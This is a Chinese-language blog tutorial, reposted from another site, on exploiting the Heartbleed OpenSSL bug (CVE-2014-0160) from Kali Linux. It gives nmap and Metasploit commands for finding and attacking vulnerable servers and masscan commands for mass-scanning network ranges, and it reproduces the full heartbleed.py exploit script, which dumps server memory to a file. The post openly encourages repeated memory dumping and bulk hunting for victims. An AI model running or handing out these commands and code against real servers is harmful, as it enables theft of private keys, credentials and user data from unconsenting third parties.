Hearbleed Hacking In Kali-linux

轉自 Linux折騰筆記

前段時間Heartbleed漏洞(CVE-2014-0160)造成的恐慌幾乎席捲全球，各大網站的安全部門也是遇到了從未有過的危機，，，簡單解釋下就是 “用戶通過TSL 加密鏈接向服務器發起 Client Hello詢問，測服務器是否正常在線幹活(形象的比喻就是心臟脈搏)，服務器發回Server hello，表明正常建立SSL通信。每次詢問都會附加一個詢問的字符長度pad length，bug來了，如果這個pad length大於實際的長度，服務器還是會返回同樣規模的字符信息，於是造成了內存裏信息的越界訪問...”

接下來這裏就演示下分別用兩個工具利用心臟出血漏洞讀取服務器內存信息。因爲內存裏的信息不是一成不變的，所以不是每次都會出好東西的，所以大家多爆幾次。

工具1：nmap+msfconsole
非常實用的hack工具組合，首先得升級msfconsole至最新版，然後給nmap添加一個針對heartbleed的掃描腳本，用來發現心臟出血漏洞：

cd /usr/share/nmap/scripts/ wget https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse cd /usr/share/nmap/nselib/ wget https://svn.nmap.org/nmap/nselib/tls.lua nmap --script-updatedb

添加成功之後掃描一個沒有更新openssl的網站：
nmap -n -p 443 -Pn --script=ssl-heartbleed servers_ip
出現如下漏洞信息：

Nmap scan report for xxx.yyy (xxx_ip) Host is up (0.071s latency). PORT STATE SERVICE 443/tcp open https | ssl-heartbleed: | VULNERABLE: | The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption. | State: VULNERABLE | Risk factor: High | Description: | OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves. | | References: | http://cvedetails.com/cve/2014-0160/ | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 |_ http://www.openssl.org/news/secadv_20140407.txt

 
然後msfconsole載入 auxiliary/scanner/ssl/openssl_heartbleed 模塊：

msf > use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS xxx_ip set RPORT 443 set VERBOSE true exploit

工具2：hearbleed.py
這個漏洞剛發佈不久，就有很多人寫了攻擊腳本軟件等，這裏介紹一個使用比較廣的python小腳本：‘heartbleed.py’，這個腳本在youtube上有很多人做了演示視頻，有興趣可以去看看,日誌最後我會符上這個腳本的代碼。使用方法：
python heartbleed.py server_ip

root@mtx:~# python heartbleed.py xxx-ip Scanning xxx-ip on port 443 Connecting... Sending Client Hello... Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 58 ... received message: type = 22, ver = 0302, length = 759 ... received message: type = 22, ver = 0302, length = 397 ... received message: type = 22, ver = 0302, length = 4 Server TLS version was 1.2 Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384 Received heartbeat response: ...................

批量掃描：
怎麼批量發現漏洞服務器，這裏給大家推薦一個掃描神器：masscan，號稱24小時掃遍全網絡！當然實際使用看是靠自己的寬帶的。使用方法：
masscan -p443 x.x.x.x/y -oL port443.list                #對網段x.x.x.x/y批量掃描開啓443端口的ip，保存爲port443.list
nmap -iL port443.list -p 443 --script=ssl-heartbleed       #nmap調用腳本掃描這些地址裏有heartbleed漏洞的ip
24小時掃遍全網絡喲，很淫蕩吧！

附件：heartbleed.py

#!/usr/bin/python # Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford ([email protected]) # The author disclaims copyright to this source code. # Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin) import sys import struct import socket import time import select import re from optparse import OptionParser import smtplib options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)') options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)') options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true') options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)') def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') hbv10 = h2bin(''' 18 03 01 00 03 01 40 00 ''') hbv11 = h2bin(''' 18 03 02 00 03 01 40 00 ''') hbv12 = h2bin(''' 18 03 03 00 03 01 40 00 ''') def hexdump(s, dumpf, quiet): dump = open(dumpf,'a') dump.write(s) dump.close() if quiet: return for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin) print ' %04x: %-48s %s' % (b, hxdat, pdat) print def recvall(s, length, timeout=5): endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: if not rdata: return None else: return rdata r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, dumpf, host, quiet): while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received from '+host+', server likely not vulnerable' return False if typ == 24: if not quiet: print 'Received heartbeat response:' hexdump(pay, dumpf, quiet) if len(pay) > 3: print 'WARNING: server '+ host +' returned more data than it should - server is vulnerable!' else: print 'Server '+host+' processed malformed heartbeat, but did not return any extra data.' return True if typ == 21: if not quiet: print 'Received alert:' hexdump(pay, dumpf, quiet) print 'Server '+ host +' returned error, likely not vulnerable' return False def connect(host, port, quiet): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) if not quiet: print 'Connecting...' sys.stdout.flush() s.connect((host, port)) return s def tls(s, quiet): if not quiet: print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if not quiet: print 'Waiting for Server Hello...' sys.stdout.flush() def parseresp(s): while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' return 0 # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: return ver def check(host, port, dumpf, quiet, starttls): response = False if starttls: try: s = smtplib.SMTP(host=host,port=port) s.ehlo() s.starttls() except smtplib.SMTPException: print 'STARTTLS not supported...' s.quit() return False print 'STARTTLS supported...' s.quit() s = connect(host, port, quiet) s.settimeout(1) try: re = s.recv(1024) s.send('ehlo starttlstest\r\n') re = s.recv(1024) s.send('starttls\r\n') re = s.recv(1024) except socket.timeout: print 'Timeout issues, going ahead anyway, but it is probably broken ...' tls(s,quiet) else: s = connect(host, port, quiet) tls(s,quiet) version = parseresp(s) if version == 0: if not quiet: print "Got an error while parsing the response, bailing ..." return False else: version = version - 0x0300 if not quiet: print "Server TLS version was 1.%d\n" % version if not quiet: print 'Sending heartbeat request...' sys.stdout.flush() if (version == 1): s.send(hbv10) response = hit_hb(s,dumpf, host, quiet) if (version == 2): s.send(hbv11) response = hit_hb(s,dumpf, host, quiet) if (version == 3): s.send(hbv12) response = hit_hb(s,dumpf, host, quiet) s.close() return response def main(): opts, args = options.parse_args() if len(args) < 1: options.print_help() return print 'Scanning ' + args[0] + ' on port ' + str(opts.port) for i in xrange(0,opts.num): check(args[0], opts.port, opts.file, opts.quiet, opts.starttls) if __name__ == '__main__': main()